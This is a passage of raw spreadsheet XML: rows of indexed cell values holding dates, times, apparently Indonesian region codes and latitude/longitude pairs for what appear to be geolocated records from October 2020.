      <c r="R2411" t="s">
        <v>364</v>
      </c>
      <c r="S2411" t="s">
        <v>108</v>
      </c>
      <c r="T2411" t="s">
        <v>33</v>
      </c>
      <c r="U2411" s="5">
        <v>10678655</v>
      </c>
      <c r="V2411" s="5" t="s">
        <v>16603</v>
      </c>
      <c r="W2411" s="5">
        <v>-631124</v>
      </c>
      <c r="X2411" t="s">
        <v>20346</v>
      </c>
      <c r="Y2411" t="str">
        <f t="shared" si="37"/>
        <v>-6.31124,106.78655</v>
      </c>
    </row>
    <row r="2412" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2412">
        <v>211699</v>
      </c>
      <c r="B2412" s="1">
        <v>44114</v>
      </c>
      <c r="C2412" s="2">
        <v>0.65263888888888888</v>
      </c>
      <c r="D2412" t="s">
        <v>22</v>
      </c>
      <c r="E2412" t="s">
        <v>23</v>
      </c>
      <c r="F2412" t="s">
        <v>8108</v>
      </c>
      <c r="G2412" t="s">
        <v>8109</v>
      </c>
      <c r="H2412" t="s">
        <v>26</v>
      </c>
      <c r="I2412" t="s">
        <v>65</v>
      </c>
      <c r="J2412" t="s">
        <v>8080</v>
      </c>
      <c r="L2412" t="s">
        <v>8110</v>
      </c>
      <c r="M2412">
        <v>3172030004</v>
      </c>
      <c r="N2412">
        <v>3172030</v>
      </c>
      <c r="O2412">
        <v>3172</v>
      </c>
      <c r="P2412">
        <v>31</v>
      </c>
      <c r="Q2412" t="s">
        <v>228</v>
      </c>
      <c r="R2412" t="s">
        <v>228</v>
      </c>
      <c r="S2412" t="s">
        <v>49</v>
      </c>
      <c r="T2412" t="s">
        <v>33</v>
      </c>
      <c r="U2412" s="5">
        <v>10689046</v>
      </c>
      <c r="V2412" s="5" t="s">
        <v>16604</v>
      </c>
      <c r="W2412" s="5">
        <v>-633628</v>
      </c>
      <c r="X2412" t="s">
        <v>20347</v>
      </c>
      <c r="Y2412" t="str">
        <f t="shared" si="37"/>
        <v>-6.33628,106.89046</v>
      </c>
    </row>
    <row r="2413" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2413">
        <v>211712</v>
      </c>
      <c r="B2413" s="1">
        <v>44114</v>
      </c>
      <c r="C2413" s="2">
        <v>0.656712962962963</v>
      </c>
      <c r="D2413" t="s">
        <v>22</v>
      </c>
      <c r="E2413" t="s">
        <v>23</v>
      </c>
      <c r="F2413" t="s">
        <v>8111</v>
      </c>
      <c r="H2413" t="s">
        <v>26</v>
      </c>
      <c r="I2413" t="s">
        <v>1542</v>
      </c>
      <c r="J2413" t="s">
        <v>1355</v>
      </c>
      <c r="L2413" t="s">
        <v>8112</v>
      </c>
      <c r="M2413">
        <v>3174070002</v>
      </c>
      <c r="N2413">
        <v>3174070</v>
      </c>
      <c r="O2413">
        <v>3174</v>
      </c>
      <c r="P2413">
        <v>31</v>
      </c>
      <c r="Q2413" t="s">
        <v>621</v>
      </c>
      <c r="R2413" t="s">
        <v>84</v>
      </c>
      <c r="S2413" t="s">
        <v>32</v>
      </c>
      <c r="T2413" t="s">
        <v>33</v>
      </c>
      <c r="U2413" s="5">
        <v>10674433</v>
      </c>
      <c r="V2413" s="5" t="s">
        <v>16605</v>
      </c>
      <c r="W2413" s="5">
        <v>-615997</v>
      </c>
      <c r="X2413" t="s">
        <v>20348</v>
      </c>
      <c r="Y2413" t="str">
        <f t="shared" si="37"/>
        <v>-6.15997,106.74433</v>
      </c>
    </row>
    <row r="2414" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2414">
        <v>211719</v>
      </c>
      <c r="B2414" s="1">
        <v>44114</v>
      </c>
      <c r="C2414" s="2">
        <v>0.66289351851851852</v>
      </c>
      <c r="D2414" t="s">
        <v>22</v>
      </c>
      <c r="E2414" t="s">
        <v>23</v>
      </c>
      <c r="F2414" t="s">
        <v>8113</v>
      </c>
      <c r="H2414" t="s">
        <v>26</v>
      </c>
      <c r="I2414" t="s">
        <v>383</v>
      </c>
      <c r="J2414" t="s">
        <v>4933</v>
      </c>
      <c r="L2414" t="s">
        <v>8114</v>
      </c>
      <c r="M2414">
        <v>3172030006</v>
      </c>
      <c r="N2414">
        <v>3172030</v>
      </c>
      <c r="O2414">
        <v>3172</v>
      </c>
      <c r="P2414">
        <v>31</v>
      </c>
      <c r="Q2414" t="s">
        <v>462</v>
      </c>
      <c r="R2414" t="s">
        <v>228</v>
      </c>
      <c r="S2414" t="s">
        <v>49</v>
      </c>
      <c r="T2414" t="s">
        <v>33</v>
      </c>
      <c r="U2414" s="5">
        <v>10690245</v>
      </c>
      <c r="V2414" s="5" t="s">
        <v>16606</v>
      </c>
      <c r="W2414" s="5">
        <v>-631727</v>
      </c>
      <c r="X2414" t="s">
        <v>20349</v>
      </c>
      <c r="Y2414" t="str">
        <f t="shared" si="37"/>
        <v>-6.31727,106.90245</v>
      </c>
    </row>
    <row r="2415" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2415">
        <v>211783</v>
      </c>
      <c r="B2415" s="1">
        <v>44114</v>
      </c>
      <c r="C2415" s="2">
        <v>0.6958333333333333</v>
      </c>
      <c r="D2415" t="s">
        <v>2648</v>
      </c>
      <c r="E2415" t="s">
        <v>23</v>
      </c>
      <c r="G2415" t="s">
        <v>8115</v>
      </c>
      <c r="H2415" t="s">
        <v>26</v>
      </c>
      <c r="J2415" t="s">
        <v>404</v>
      </c>
      <c r="L2415" t="s">
        <v>8116</v>
      </c>
      <c r="M2415">
        <v>3174020005</v>
      </c>
      <c r="N2415">
        <v>3174020</v>
      </c>
      <c r="O2415">
        <v>3174</v>
      </c>
      <c r="P2415">
        <v>31</v>
      </c>
      <c r="Q2415" t="s">
        <v>30</v>
      </c>
      <c r="R2415" t="s">
        <v>31</v>
      </c>
      <c r="S2415" t="s">
        <v>32</v>
      </c>
      <c r="T2415" t="s">
        <v>33</v>
      </c>
      <c r="U2415" s="5">
        <v>10676919</v>
      </c>
      <c r="V2415" s="5" t="s">
        <v>14754</v>
      </c>
      <c r="W2415" s="5">
        <v>-616605</v>
      </c>
      <c r="X2415" t="s">
        <v>20350</v>
      </c>
      <c r="Y2415" t="str">
        <f t="shared" si="37"/>
        <v>-6.16605,106.76919</v>
      </c>
    </row>
    <row r="2416" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2416">
        <v>211808</v>
      </c>
      <c r="B2416" s="1">
        <v>44114</v>
      </c>
      <c r="C2416" s="2">
        <v>0.69190972222222225</v>
      </c>
      <c r="D2416" t="s">
        <v>85</v>
      </c>
      <c r="E2416" t="s">
        <v>23</v>
      </c>
      <c r="F2416" t="s">
        <v>8117</v>
      </c>
      <c r="G2416" t="s">
        <v>8118</v>
      </c>
      <c r="H2416" t="s">
        <v>26</v>
      </c>
      <c r="J2416" t="s">
        <v>2622</v>
      </c>
      <c r="K2416" t="s">
        <v>8119</v>
      </c>
      <c r="L2416" t="s">
        <v>8120</v>
      </c>
      <c r="M2416">
        <v>3502190004</v>
      </c>
      <c r="N2416">
        <v>3502190</v>
      </c>
      <c r="O2416">
        <v>3502</v>
      </c>
      <c r="P2416">
        <v>35</v>
      </c>
      <c r="Q2416" t="s">
        <v>7996</v>
      </c>
      <c r="R2416" t="s">
        <v>7997</v>
      </c>
      <c r="S2416" t="s">
        <v>7998</v>
      </c>
      <c r="T2416" t="s">
        <v>1221</v>
      </c>
      <c r="U2416" s="5">
        <v>11151333</v>
      </c>
      <c r="V2416" s="5" t="s">
        <v>16607</v>
      </c>
      <c r="W2416" s="5">
        <v>-784509</v>
      </c>
      <c r="X2416" t="s">
        <v>20351</v>
      </c>
      <c r="Y2416" t="str">
        <f t="shared" si="37"/>
        <v>-7.84509,111.51333</v>
      </c>
    </row>
    <row r="2417" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2417">
        <v>211908</v>
      </c>
      <c r="B2417" s="1">
        <v>44114</v>
      </c>
      <c r="C2417" s="2">
        <v>0.76016203703703711</v>
      </c>
      <c r="D2417" t="s">
        <v>22</v>
      </c>
      <c r="E2417" t="s">
        <v>23</v>
      </c>
      <c r="F2417" t="s">
        <v>8121</v>
      </c>
      <c r="G2417" t="s">
        <v>8122</v>
      </c>
      <c r="H2417" t="s">
        <v>26</v>
      </c>
      <c r="I2417" t="s">
        <v>65</v>
      </c>
      <c r="J2417" t="s">
        <v>4020</v>
      </c>
      <c r="L2417" t="s">
        <v>8123</v>
      </c>
      <c r="M2417">
        <v>3172050004</v>
      </c>
      <c r="N2417">
        <v>3172050</v>
      </c>
      <c r="O2417">
        <v>3172</v>
      </c>
      <c r="P2417">
        <v>31</v>
      </c>
      <c r="Q2417" t="s">
        <v>2717</v>
      </c>
      <c r="R2417" t="s">
        <v>358</v>
      </c>
      <c r="S2417" t="s">
        <v>49</v>
      </c>
      <c r="T2417" t="s">
        <v>33</v>
      </c>
      <c r="U2417" s="5">
        <v>10687525</v>
      </c>
      <c r="V2417" s="5" t="s">
        <v>16608</v>
      </c>
      <c r="W2417" s="5">
        <v>-629449</v>
      </c>
      <c r="X2417" t="s">
        <v>20352</v>
      </c>
      <c r="Y2417" t="str">
        <f t="shared" si="37"/>
        <v>-6.29449,106.87525</v>
      </c>
    </row>
    <row r="2418" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2418">
        <v>211958</v>
      </c>
      <c r="B2418" s="1">
        <v>44114</v>
      </c>
      <c r="C2418" s="2">
        <v>0.78125</v>
      </c>
      <c r="D2418" t="s">
        <v>2648</v>
      </c>
      <c r="E2418" t="s">
        <v>23</v>
      </c>
      <c r="G2418" t="s">
        <v>8124</v>
      </c>
      <c r="H2418" t="s">
        <v>26</v>
      </c>
      <c r="J2418" t="s">
        <v>2580</v>
      </c>
      <c r="L2418" t="s">
        <v>8125</v>
      </c>
      <c r="M2418">
        <v>3172040005</v>
      </c>
      <c r="N2418">
        <v>3172040</v>
      </c>
      <c r="O2418">
        <v>3172</v>
      </c>
      <c r="P2418">
        <v>31</v>
      </c>
      <c r="Q2418" t="s">
        <v>1351</v>
      </c>
      <c r="R2418" t="s">
        <v>281</v>
      </c>
      <c r="S2418" t="s">
        <v>49</v>
      </c>
      <c r="T2418" t="s">
        <v>33</v>
      </c>
      <c r="U2418" s="5">
        <v>10689377</v>
      </c>
      <c r="V2418" s="5" t="s">
        <v>16609</v>
      </c>
      <c r="W2418" s="5">
        <v>-624109</v>
      </c>
      <c r="X2418" t="s">
        <v>19965</v>
      </c>
      <c r="Y2418" t="str">
        <f t="shared" si="37"/>
        <v>-6.24109,106.89377</v>
      </c>
    </row>
    <row r="2419" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2419">
        <v>211967</v>
      </c>
      <c r="B2419" s="1">
        <v>44114</v>
      </c>
      <c r="C2419" s="2">
        <v>0.78783564814814822</v>
      </c>
      <c r="D2419" t="s">
        <v>22</v>
      </c>
      <c r="E2419" t="s">
        <v>23</v>
      </c>
      <c r="F2419" t="s">
        <v>8126</v>
      </c>
      <c r="H2419" t="s">
        <v>26</v>
      </c>
      <c r="I2419" t="s">
        <v>65</v>
      </c>
      <c r="J2419" t="s">
        <v>5280</v>
      </c>
      <c r="L2419" t="s">
        <v>8127</v>
      </c>
      <c r="M2419">
        <v>3171060004</v>
      </c>
      <c r="N2419">
        <v>3171060</v>
      </c>
      <c r="O2419">
        <v>3171</v>
      </c>
      <c r="P2419">
        <v>31</v>
      </c>
      <c r="Q2419" t="s">
        <v>5027</v>
      </c>
      <c r="R2419" t="s">
        <v>1236</v>
      </c>
      <c r="S2419" t="s">
        <v>108</v>
      </c>
      <c r="T2419" t="s">
        <v>33</v>
      </c>
      <c r="U2419" s="5">
        <v>10681389</v>
      </c>
      <c r="V2419" s="5" t="s">
        <v>16610</v>
      </c>
      <c r="W2419" s="5">
        <v>-624429</v>
      </c>
      <c r="X2419" t="s">
        <v>20353</v>
      </c>
      <c r="Y2419" t="str">
        <f t="shared" si="37"/>
        <v>-6.24429,106.81389</v>
      </c>
    </row>
    <row r="2420" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2420">
        <v>212201</v>
      </c>
      <c r="B2420" s="1">
        <v>44114</v>
      </c>
      <c r="C2420" s="2">
        <v>0.62638888888888888</v>
      </c>
      <c r="D2420" t="s">
        <v>2648</v>
      </c>
      <c r="E2420" t="s">
        <v>23</v>
      </c>
      <c r="G2420" t="s">
        <v>8128</v>
      </c>
      <c r="H2420" t="s">
        <v>26</v>
      </c>
      <c r="J2420" t="s">
        <v>8129</v>
      </c>
      <c r="L2420" t="s">
        <v>8130</v>
      </c>
      <c r="M2420">
        <v>3172030002</v>
      </c>
      <c r="N2420">
        <v>3172030</v>
      </c>
      <c r="O2420">
        <v>3172</v>
      </c>
      <c r="P2420">
        <v>31</v>
      </c>
      <c r="Q2420" t="s">
        <v>1534</v>
      </c>
      <c r="R2420" t="s">
        <v>228</v>
      </c>
      <c r="S2420" t="s">
        <v>49</v>
      </c>
      <c r="T2420" t="s">
        <v>33</v>
      </c>
      <c r="U2420" s="5">
        <v>10690686</v>
      </c>
      <c r="V2420" s="5" t="s">
        <v>16611</v>
      </c>
      <c r="W2420" s="5">
        <v>-633504</v>
      </c>
      <c r="X2420" t="s">
        <v>20354</v>
      </c>
      <c r="Y2420" t="str">
        <f t="shared" si="37"/>
        <v>-6.33504,106.90686</v>
      </c>
    </row>
    <row r="2421" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2421">
        <v>212553</v>
      </c>
      <c r="B2421" s="1">
        <v>44115</v>
      </c>
      <c r="C2421" s="2">
        <v>2.2916666666666669E-2</v>
      </c>
      <c r="D2421" t="s">
        <v>2648</v>
      </c>
      <c r="E2421" t="s">
        <v>23</v>
      </c>
      <c r="G2421" t="s">
        <v>8131</v>
      </c>
      <c r="H2421" t="s">
        <v>26</v>
      </c>
      <c r="J2421" t="s">
        <v>425</v>
      </c>
      <c r="L2421" t="s">
        <v>8132</v>
      </c>
      <c r="M2421">
        <v>3174020006</v>
      </c>
      <c r="N2421">
        <v>3174020</v>
      </c>
      <c r="O2421">
        <v>3174</v>
      </c>
      <c r="P2421">
        <v>31</v>
      </c>
      <c r="Q2421" t="s">
        <v>427</v>
      </c>
      <c r="R2421" t="s">
        <v>31</v>
      </c>
      <c r="S2421" t="s">
        <v>32</v>
      </c>
      <c r="T2421" t="s">
        <v>33</v>
      </c>
      <c r="U2421" s="5">
        <v>10675141</v>
      </c>
      <c r="V2421" s="5" t="s">
        <v>16612</v>
      </c>
      <c r="W2421" s="5">
        <v>-617436</v>
      </c>
      <c r="X2421" t="s">
        <v>20355</v>
      </c>
      <c r="Y2421" t="str">
        <f t="shared" si="37"/>
        <v>-6.17436,106.75141</v>
      </c>
    </row>
    <row r="2422" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2422">
        <v>212578</v>
      </c>
      <c r="B2422" s="1">
        <v>44115</v>
      </c>
      <c r="C2422" s="2">
        <v>3.125E-2</v>
      </c>
      <c r="D2422" t="s">
        <v>2648</v>
      </c>
      <c r="E2422" t="s">
        <v>23</v>
      </c>
      <c r="G2422" t="s">
        <v>8133</v>
      </c>
      <c r="H2422" t="s">
        <v>26</v>
      </c>
      <c r="J2422" t="s">
        <v>2916</v>
      </c>
      <c r="L2422" t="s">
        <v>8134</v>
      </c>
      <c r="M2422">
        <v>3172040003</v>
      </c>
      <c r="N2422">
        <v>3172040</v>
      </c>
      <c r="O2422">
        <v>3172</v>
      </c>
      <c r="P2422">
        <v>31</v>
      </c>
      <c r="Q2422" t="s">
        <v>552</v>
      </c>
      <c r="R2422" t="s">
        <v>281</v>
      </c>
      <c r="S2422" t="s">
        <v>49</v>
      </c>
      <c r="T2422" t="s">
        <v>33</v>
      </c>
      <c r="U2422" s="5">
        <v>10688162</v>
      </c>
      <c r="V2422" s="5" t="s">
        <v>16613</v>
      </c>
      <c r="W2422" s="5">
        <v>-626295</v>
      </c>
      <c r="X2422" t="s">
        <v>20356</v>
      </c>
      <c r="Y2422" t="str">
        <f t="shared" si="37"/>
        <v>-6.26295,106.88162</v>
      </c>
    </row>
    <row r="2423" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2423">
        <v>215347</v>
      </c>
      <c r="B2423" s="1">
        <v>44116</v>
      </c>
      <c r="C2423" s="2">
        <v>0.15069444444444444</v>
      </c>
      <c r="D2423" t="s">
        <v>2648</v>
      </c>
      <c r="E2423" t="s">
        <v>23</v>
      </c>
      <c r="G2423" t="s">
        <v>8135</v>
      </c>
      <c r="H2423" t="s">
        <v>26</v>
      </c>
      <c r="J2423" t="s">
        <v>8136</v>
      </c>
      <c r="L2423" t="s">
        <v>8137</v>
      </c>
      <c r="M2423">
        <v>3172020001</v>
      </c>
      <c r="N2423">
        <v>3172020</v>
      </c>
      <c r="O2423">
        <v>3172</v>
      </c>
      <c r="P2423">
        <v>31</v>
      </c>
      <c r="Q2423" t="s">
        <v>7796</v>
      </c>
      <c r="R2423" t="s">
        <v>1644</v>
      </c>
      <c r="S2423" t="s">
        <v>49</v>
      </c>
      <c r="T2423" t="s">
        <v>33</v>
      </c>
      <c r="U2423" s="5">
        <v>10688992</v>
      </c>
      <c r="V2423" s="5" t="s">
        <v>16614</v>
      </c>
      <c r="W2423" s="5">
        <v>-635603</v>
      </c>
      <c r="X2423" t="s">
        <v>20357</v>
      </c>
      <c r="Y2423" t="str">
        <f t="shared" si="37"/>
        <v>-6.35603,106.88992</v>
      </c>
    </row>
    <row r="2424" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2424">
        <v>215421</v>
      </c>
      <c r="B2424" s="1">
        <v>44117</v>
      </c>
      <c r="C2424" s="2">
        <v>0.15427083333333333</v>
      </c>
      <c r="D2424" t="s">
        <v>22</v>
      </c>
      <c r="E2424" t="s">
        <v>23</v>
      </c>
      <c r="F2424" t="s">
        <v>8138</v>
      </c>
      <c r="G2424" t="s">
        <v>8139</v>
      </c>
      <c r="H2424" t="s">
        <v>26</v>
      </c>
      <c r="I2424" t="s">
        <v>8140</v>
      </c>
      <c r="J2424" t="s">
        <v>2627</v>
      </c>
      <c r="L2424" t="s">
        <v>8141</v>
      </c>
      <c r="M2424">
        <v>3205070002</v>
      </c>
      <c r="N2424">
        <v>3205070</v>
      </c>
      <c r="O2424">
        <v>3205</v>
      </c>
      <c r="P2424">
        <v>32</v>
      </c>
      <c r="Q2424" t="s">
        <v>6865</v>
      </c>
      <c r="R2424" t="s">
        <v>6865</v>
      </c>
      <c r="S2424" t="s">
        <v>1866</v>
      </c>
      <c r="T2424" t="s">
        <v>42</v>
      </c>
      <c r="U2424" s="5">
        <v>10773165</v>
      </c>
      <c r="V2424" s="5" t="s">
        <v>16615</v>
      </c>
      <c r="W2424" s="5">
        <v>-763232</v>
      </c>
      <c r="X2424" t="s">
        <v>20358</v>
      </c>
      <c r="Y2424" t="str">
        <f t="shared" si="37"/>
        <v>-7.63232,107.73165</v>
      </c>
    </row>
    <row r="2425" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2425">
        <v>215422</v>
      </c>
      <c r="B2425" s="1">
        <v>44120</v>
      </c>
      <c r="C2425" s="2">
        <v>0.39934027777777775</v>
      </c>
      <c r="D2425" t="s">
        <v>22</v>
      </c>
      <c r="E2425" t="s">
        <v>23</v>
      </c>
      <c r="F2425" t="s">
        <v>8142</v>
      </c>
      <c r="G2425" t="s">
        <v>8143</v>
      </c>
      <c r="H2425" t="s">
        <v>26</v>
      </c>
      <c r="I2425" t="s">
        <v>5530</v>
      </c>
      <c r="J2425" t="s">
        <v>8144</v>
      </c>
      <c r="M2425">
        <v>3172090006</v>
      </c>
      <c r="N2425">
        <v>3172090</v>
      </c>
      <c r="O2425">
        <v>3172</v>
      </c>
      <c r="P2425">
        <v>31</v>
      </c>
      <c r="Q2425" t="s">
        <v>2283</v>
      </c>
      <c r="R2425" t="s">
        <v>890</v>
      </c>
      <c r="S2425" t="s">
        <v>49</v>
      </c>
      <c r="T2425" t="s">
        <v>33</v>
      </c>
      <c r="U2425" s="5">
        <v>10687742</v>
      </c>
      <c r="V2425" s="5" t="s">
        <v>16616</v>
      </c>
      <c r="W2425" s="5">
        <v>-618181</v>
      </c>
      <c r="X2425" t="s">
        <v>20359</v>
      </c>
      <c r="Y2425" t="str">
        <f t="shared" si="37"/>
        <v>-6.18181,106.87742</v>
      </c>
    </row>
    <row r="2426" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2426">
        <v>215423</v>
      </c>
      <c r="B2426" s="1">
        <v>44120</v>
      </c>
      <c r="C2426" s="2">
        <v>0.4152777777777778</v>
      </c>
      <c r="D2426" t="s">
        <v>2648</v>
      </c>
      <c r="E2426" t="s">
        <v>23</v>
      </c>
      <c r="G2426" t="s">
        <v>8145</v>
      </c>
      <c r="H2426" t="s">
        <v>26</v>
      </c>
      <c r="J2426" t="s">
        <v>8146</v>
      </c>
      <c r="L2426" t="s">
        <v>8147</v>
      </c>
      <c r="M2426">
        <v>3171050004</v>
      </c>
      <c r="N2426">
        <v>3171050</v>
      </c>
      <c r="O2426">
        <v>3171</v>
      </c>
      <c r="P2426">
        <v>31</v>
      </c>
      <c r="Q2426" t="s">
        <v>8148</v>
      </c>
      <c r="R2426" t="s">
        <v>508</v>
      </c>
      <c r="S2426" t="s">
        <v>108</v>
      </c>
      <c r="T2426" t="s">
        <v>33</v>
      </c>
      <c r="U2426" s="5">
        <v>10677120</v>
      </c>
      <c r="V2426" s="5" t="s">
        <v>16617</v>
      </c>
      <c r="W2426" s="5">
        <v>-623738</v>
      </c>
      <c r="X2426" t="s">
        <v>20360</v>
      </c>
      <c r="Y2426" t="str">
        <f t="shared" si="37"/>
        <v>-6.23738,106.77120</v>
      </c>
    </row>
    <row r="2427" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2427">
        <v>215431</v>
      </c>
      <c r="B2427" s="1">
        <v>44120</v>
      </c>
      <c r="C2427" s="2">
        <v>0.44214120370370374</v>
      </c>
      <c r="D2427" t="s">
        <v>22</v>
      </c>
      <c r="E2427" t="s">
        <v>23</v>
      </c>
      <c r="F2427" t="s">
        <v>8149</v>
      </c>
      <c r="H2427" t="s">
        <v>26</v>
      </c>
      <c r="I2427" t="s">
        <v>137</v>
      </c>
      <c r="J2427" t="s">
        <v>8150</v>
      </c>
      <c r="L2427" t="s">
        <v>8151</v>
      </c>
      <c r="M2427">
        <v>3175040002</v>
      </c>
      <c r="N2427">
        <v>3175040</v>
      </c>
      <c r="O2427">
        <v>3175</v>
      </c>
      <c r="P2427">
        <v>31</v>
      </c>
      <c r="Q2427" t="s">
        <v>2730</v>
      </c>
      <c r="R2427" t="s">
        <v>2063</v>
      </c>
      <c r="S2427" t="s">
        <v>547</v>
      </c>
      <c r="T2427" t="s">
        <v>33</v>
      </c>
      <c r="U2427" s="5">
        <v>10690729</v>
      </c>
      <c r="V2427" s="5" t="s">
        <v>16618</v>
      </c>
      <c r="W2427" s="5">
        <v>-613373</v>
      </c>
      <c r="X2427" t="s">
        <v>20361</v>
      </c>
      <c r="Y2427" t="str">
        <f t="shared" si="37"/>
        <v>-6.13373,106.90729</v>
      </c>
    </row>
    <row r="2428" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2428">
        <v>215433</v>
      </c>
      <c r="B2428" s="1">
        <v>44120</v>
      </c>
      <c r="C2428" s="2">
        <v>0.44305555555555554</v>
      </c>
      <c r="D2428" t="s">
        <v>2648</v>
      </c>
      <c r="E2428" t="s">
        <v>23</v>
      </c>
      <c r="G2428" t="s">
        <v>8152</v>
      </c>
      <c r="H2428" t="s">
        <v>26</v>
      </c>
      <c r="I2428" t="s">
        <v>103</v>
      </c>
      <c r="J2428" t="s">
        <v>7846</v>
      </c>
      <c r="L2428" t="s">
        <v>8153</v>
      </c>
      <c r="M2428">
        <v>3174040001</v>
      </c>
      <c r="N2428">
        <v>3174040</v>
      </c>
      <c r="O2428">
        <v>3174</v>
      </c>
      <c r="P2428">
        <v>31</v>
      </c>
      <c r="Q2428" t="s">
        <v>730</v>
      </c>
      <c r="R2428" t="s">
        <v>377</v>
      </c>
      <c r="S2428" t="s">
        <v>32</v>
      </c>
      <c r="T2428" t="s">
        <v>33</v>
      </c>
      <c r="U2428" s="5">
        <v>10678102</v>
      </c>
      <c r="V2428" s="5" t="s">
        <v>16619</v>
      </c>
      <c r="W2428" s="5">
        <v>-617402</v>
      </c>
      <c r="X2428" t="s">
        <v>20362</v>
      </c>
      <c r="Y2428" t="str">
        <f t="shared" si="37"/>
        <v>-6.17402,106.78102</v>
      </c>
    </row>
    <row r="2429" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2429">
        <v>215454</v>
      </c>
      <c r="B2429" s="1">
        <v>44120</v>
      </c>
      <c r="C2429" s="2">
        <v>0.4777777777777778</v>
      </c>
      <c r="D2429" t="s">
        <v>2648</v>
      </c>
      <c r="E2429" t="s">
        <v>23</v>
      </c>
      <c r="G2429" t="s">
        <v>8154</v>
      </c>
      <c r="H2429" t="s">
        <v>26</v>
      </c>
      <c r="I2429" t="s">
        <v>710</v>
      </c>
      <c r="J2429" t="s">
        <v>404</v>
      </c>
      <c r="L2429" t="s">
        <v>8155</v>
      </c>
      <c r="M2429">
        <v>3174020005</v>
      </c>
      <c r="N2429">
        <v>3174020</v>
      </c>
      <c r="O2429">
        <v>3174</v>
      </c>
      <c r="P2429">
        <v>31</v>
      </c>
      <c r="Q2429" t="s">
        <v>30</v>
      </c>
      <c r="R2429" t="s">
        <v>31</v>
      </c>
      <c r="S2429" t="s">
        <v>32</v>
      </c>
      <c r="T2429" t="s">
        <v>33</v>
      </c>
      <c r="U2429" s="5">
        <v>10676927</v>
      </c>
      <c r="V2429" s="5" t="s">
        <v>16620</v>
      </c>
      <c r="W2429" s="5">
        <v>-616611</v>
      </c>
      <c r="X2429" t="s">
        <v>18563</v>
      </c>
      <c r="Y2429" t="str">
        <f t="shared" si="37"/>
        <v>-6.16611,106.76927</v>
      </c>
    </row>
    <row r="2430" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2430">
        <v>215497</v>
      </c>
      <c r="B2430" s="1">
        <v>44120</v>
      </c>
      <c r="C2430" s="2">
        <v>0.52956018518518522</v>
      </c>
      <c r="D2430" t="s">
        <v>22</v>
      </c>
      <c r="E2430" t="s">
        <v>23</v>
      </c>
      <c r="F2430" t="s">
        <v>8156</v>
      </c>
      <c r="G2430" t="s">
        <v>8157</v>
      </c>
      <c r="H2430" t="s">
        <v>26</v>
      </c>
      <c r="I2430" t="s">
        <v>111</v>
      </c>
      <c r="J2430" t="s">
        <v>1108</v>
      </c>
      <c r="L2430" t="s">
        <v>8158</v>
      </c>
      <c r="M2430">
        <v>3174020005</v>
      </c>
      <c r="N2430">
        <v>3174020</v>
      </c>
      <c r="O2430">
        <v>3174</v>
      </c>
      <c r="P2430">
        <v>31</v>
      </c>
      <c r="Q2430" t="s">
        <v>30</v>
      </c>
      <c r="R2430" t="s">
        <v>31</v>
      </c>
      <c r="S2430" t="s">
        <v>32</v>
      </c>
      <c r="T2430" t="s">
        <v>33</v>
      </c>
      <c r="U2430" s="5">
        <v>10677960</v>
      </c>
      <c r="V2430" s="5" t="s">
        <v>16621</v>
      </c>
      <c r="W2430" s="5">
        <v>-617833</v>
      </c>
      <c r="X2430" t="s">
        <v>20363</v>
      </c>
      <c r="Y2430" t="str">
        <f t="shared" si="37"/>
        <v>-6.17833,106.77960</v>
      </c>
    </row>
    <row r="2431" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2431">
        <v>215501</v>
      </c>
      <c r="B2431" s="1">
        <v>44120</v>
      </c>
      <c r="C2431" s="2">
        <v>0.53553240740740737</v>
      </c>
      <c r="D2431" t="s">
        <v>22</v>
      </c>
      <c r="E2431" t="s">
        <v>23</v>
      </c>
      <c r="F2431" t="s">
        <v>8159</v>
      </c>
      <c r="G2431" t="s">
        <v>8160</v>
      </c>
      <c r="H2431" t="s">
        <v>26</v>
      </c>
      <c r="I2431" t="s">
        <v>197</v>
      </c>
      <c r="J2431" t="s">
        <v>4142</v>
      </c>
      <c r="L2431" t="s">
        <v>8161</v>
      </c>
      <c r="M2431">
        <v>3171040004</v>
      </c>
      <c r="N2431">
        <v>3171040</v>
      </c>
      <c r="O2431">
        <v>3171</v>
      </c>
      <c r="P2431">
        <v>31</v>
      </c>
      <c r="Q2431" t="s">
        <v>4144</v>
      </c>
      <c r="R2431" t="s">
        <v>163</v>
      </c>
      <c r="S2431" t="s">
        <v>108</v>
      </c>
      <c r="T2431" t="s">
        <v>33</v>
      </c>
      <c r="U2431" s="5">
        <v>10675993</v>
      </c>
      <c r="V2431" s="5" t="s">
        <v>16622</v>
      </c>
      <c r="W2431" s="5">
        <v>-623871</v>
      </c>
      <c r="X2431" t="s">
        <v>20364</v>
      </c>
      <c r="Y2431" t="str">
        <f t="shared" si="37"/>
        <v>-6.23871,106.75993</v>
      </c>
    </row>
    <row r="2432" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2432">
        <v>215544</v>
      </c>
      <c r="B2432" s="1">
        <v>44120</v>
      </c>
      <c r="C2432" s="2">
        <v>0.57916666666666672</v>
      </c>
      <c r="D2432" t="s">
        <v>2648</v>
      </c>
      <c r="E2432" t="s">
        <v>23</v>
      </c>
      <c r="G2432" t="s">
        <v>8162</v>
      </c>
      <c r="H2432" t="s">
        <v>26</v>
      </c>
      <c r="J2432" t="s">
        <v>404</v>
      </c>
      <c r="L2432" t="s">
        <v>8163</v>
      </c>
      <c r="M2432">
        <v>3174020005</v>
      </c>
      <c r="N2432">
        <v>3174020</v>
      </c>
      <c r="O2432">
        <v>3174</v>
      </c>
      <c r="P2432">
        <v>31</v>
      </c>
      <c r="Q2432" t="s">
        <v>30</v>
      </c>
      <c r="R2432" t="s">
        <v>31</v>
      </c>
